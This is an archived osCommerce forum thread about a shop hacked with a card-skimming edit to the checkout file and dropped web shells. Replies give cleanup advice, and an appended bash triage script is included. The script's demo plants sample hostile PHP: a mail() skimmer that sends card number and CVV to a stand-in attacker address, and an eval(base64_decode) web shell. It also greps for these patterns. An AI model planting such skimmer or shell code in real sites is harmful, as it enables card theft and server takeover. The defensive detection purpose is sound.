steveboy Posted October 11, 2010

Hi all, I'm a little cheesed off. I discovered that my checkout confirmation file had been hacked to include an email script to email card details to a hacker. I first noticed something amiss when I spotted some strange files in the catalog folder with these filenames:

goog1e238159a6ca536d
googlee653c404cfc1
googleb6a05781bc64

Inside these files is a comment at the top saying "Web Shell by boff". Having a feeling what a hacker would be after, I straight away checked the dates of the files and noticed checkout conf had been modified much more recently than I had modified it, so I went in and deleted the email part that was sending the card details to this asshole. Has anybody got any idea how they managed to gain access? I also found a single file, filemanager, which had been uploaded by him on the same date, which I guess he used to upload the other files.

So after my cleanup I'm left with a little issue: 100s of files keep appearing in the catalog folder each day. They are empty apart from a single-digit number. Here is what it looks like.. No matter how many times I delete these files they come back one at a time until there are 800-900 of them. I'm sure this has happened to somebody else; if it has, can you advise what to do about it? Thanks
SirYarquest Posted October 11, 2010

Well, I too had issues a few months ago. I did everything Google and GoDaddy told me to do, removing files, etc. But they still wouldn't confirm my site was safe. I'm thinking it's because the same files were showing up, just like you. It was so bad, I killed the hosting, moved it to another server, and decided to switch to Zen-Cart because my buddies told me that there were security issues with OSC. I was on an old version, so I thought that was the issue. Well, Zen-Cart didn't work at all. Frustrated, I decided to come back here. Sorry for being so long-winded, but now after reading your post from today, I'm worried I'm going to get hacked again.

Here's what I do know: they inserted a script into my site, in several places. I do know that since 07-25-10 my site has had 9000-plus hits. But my site has been down since then, so it must be hackers and not customers. I never had that kind of traffic before. I hate this; I certainly hope we get some help on here.

Tony (sirYarquest)
Guest Posted October 11, 2010

Steve / Tony, READ the security forum on how to secure your admin and catalog. Steve, you will need to restore from a known 'clean' backup of your site and then secure it. Also, if you're a religious man, pray NONE of your customers report the security breach, because the fines are hefty and it is a federal offense to store credit card information on your server if you are not PCI DSS compliant.

Chris
steveboy (Author) Posted October 12, 2010

Thanks for the replies. Any ideas on what is generating the files, as in the screenshot?
Guest Posted October 12, 2010

Steve, you are going to have to search all files for malicious code and also look for anomalous files that the hacker could be using to gain access to your website. It's a long, tiresome process, but it is necessary to ensure the site is clean and secure.

Chris
FIMBLE Posted October 12, 2010

The files can be anywhere in your fileset. Look for strange .php files (names), compare your fileset with another osCommerce fileset, then check the files that differ. I have found these files in the images folder with an htaccess file to redirect, not only the one instance but many, and a new folder with many, many hack files in it named innocently so you might not notice them. The hackers are crafty sods!

I found a hack in a payment module file a week or so ago that redirected payment details to a hacker. It would be best to delete the whole lot and restore from your clean backup to ensure all has gone.

The usual: rename your admin, remove the file_manager.php and the define_language.php from your admin, check your file permissions, change your passwords, and if you are storing credit card details stop doing that now or you could find yourself in trouble with the law. The only payment method I am aware of is the Credit Card module, for testing purposes only.

Nic

Sometimes you're the dog and sometimes the lamp post
My Contributions
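The triage the thread describes (compare the live fileset against a clean osCommerce copy, check what differs, grep for shell and skimmer markers, find the recurring single-digit files, look at modification dates and permissions) can be scripted rather than done by eye. The script below is an added example written for this page, not code from any poster or from osCommerce. It assumes a clean copy of the same osCommerce version is unpacked beside the live site (e.g. ./clean and ./live), and the sample trees it builds under make_sample (the appended mail() call, the google-lookalike shell name, the .htaccess in images/, the one-digit files) are constructed to mirror what the thread reports, not recovered from the hacked site.

```shell
#!/usr/bin/env bash
# Added triage helpers for a suspected osCommerce compromise (example code, not from the thread).
# Assumption: a CLEAN copy of the exact same osCommerce version sits beside the LIVE site,
# e.g. ./clean and ./live, and this is run from a shell on the web host.
set -u

# Files present in the live site but absent from the clean fileset: dropped shells,
# uploaders, stray .htaccess files in images/, the single-digit junk files, etc.
extra_files() {            # $1=clean dir  $2=live dir
  local clean=$1 live=$2
  ( cd "$live" && find . -type f ) | while IFS= read -r f; do
    [ -e "$clean/$f" ] || printf '%s\n' "${f#./}"
  done | sort
}

# Files that exist in both trees but whose contents differ (e.g. a modified checkout_confirmation.php).
changed_files() {          # $1=clean dir  $2=live dir
  local clean=$1 live=$2
  ( cd "$clean" && find . -type f ) | while IFS= read -r f; do
    if [ -e "$live/$f" ] && ! cmp -s "$clean/$f" "$live/$f"; then printf '%s\n' "${f#./}"; fi
  done | sort
}

# Grep for markers common in PHP shells and card skimmers. A hit is a lead, not proof:
# legitimate code calls mail() too, so read every match in context.
grep_suspicious() {        # $1=dir
  grep -rnI --include='*.php' --include='.htaccess' -E \
    -e 'eval[[:space:]]*\(' -e 'base64_decode' -e 'Web Shell' \
    -e 'mail[[:space:]]*\(' -e 'cc_number|cc_cvv|cc_expires' -e 'RewriteRule' "$1" || true
}

# Files whose entire content is one digit, like the ones the poster keeps deleting.
junk_digit_files() {       # $1=dir
  find "$1" -type f -size -3c | while IFS= read -r f; do
    grep -qxE '[0-9]' "$f" && printf '%s\n' "${f#$1/}"
  done | sort
}

# Files touched in the last N days (default 7), and files anyone on the box can write to.
recently_modified() { find "$1" -type f -mtime "-${2:-7}" | sort; }   # $1=dir $2=days
world_writable()    { find "$1" -type f -perm -o=w | sort; }          # $1=dir

# Constructed sample trees for a self-contained demo; all contents are made up for illustration.
make_sample() {            # $1=scratch dir
  local root=$1 d
  mkdir -p "$root/clean/catalog/images" "$root/live/catalog/images"
  for d in clean live; do
    printf '<?php\n  require("includes/application_top.php");\n  // page body\n?>\n' \
      > "$root/$d/catalog/checkout_confirmation.php"
    printf '<?php echo "ok"; ?>\n' > "$root/$d/catalog/index.php"
  done
  # skimmer appended to the live copy only: mails the posted card fields out
  printf '<?php mail("attacker@example.invalid","cc",$_POST["cc_number"].$_POST["cc_cvv"]); ?>\n' \
    >> "$root/live/catalog/checkout_confirmation.php"
  # dropped shell with a google-lookalike name, as in the thread
  printf '<?php /* Web Shell by boff */ eval(base64_decode($_REQUEST["c"])); ?>\n' \
    > "$root/live/catalog/googlee653c404cfc1.php"
  # redirect rule hidden in images/
  printf 'RewriteEngine On\nRewriteRule ^ http://example.invalid/ [R,L]\n' > "$root/live/catalog/images/.htaccess"
  # three single-digit junk files (names are made up; the thread only shows a screenshot)
  for d in 1 2 3; do printf '%s\n' "$d" > "$root/live/catalog/file$d"; done
  # only the dropped shell is world-writable, so the permissions check has something to find
  chmod -R o-w "$root"
  chmod o+w "$root/live/catalog/googlee653c404cfc1.php"
}

if [ "${1:-}" = "--demo" ]; then
  tmp=$(mktemp -d); make_sample "$tmp"
  echo "== extra files ==";        extra_files "$tmp/clean" "$tmp/live"
  echo "== changed files ==";      changed_files "$tmp/clean" "$tmp/live"
  echo "== suspicious lines ==";   grep_suspicious "$tmp/live"
  echo "== single-digit files =="; junk_digit_files "$tmp/live"
  echo "== world-writable ==";     world_writable "$tmp/live"
  rm -rf "$tmp"
fi
```

Run it with --demo to see the constructed case, or source it and point the functions at your own clean and live directories. The comparison functions only report files that differ or are extra; the list is the worklist, and every hit still has to be read before deciding it is malicious. None of this replaces the advice above to restore from a known clean backup and then harden admin: the script only helps find what the attacker left so you know what the backup must predate.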
Archived
This topic is now archived and is closed to further replies.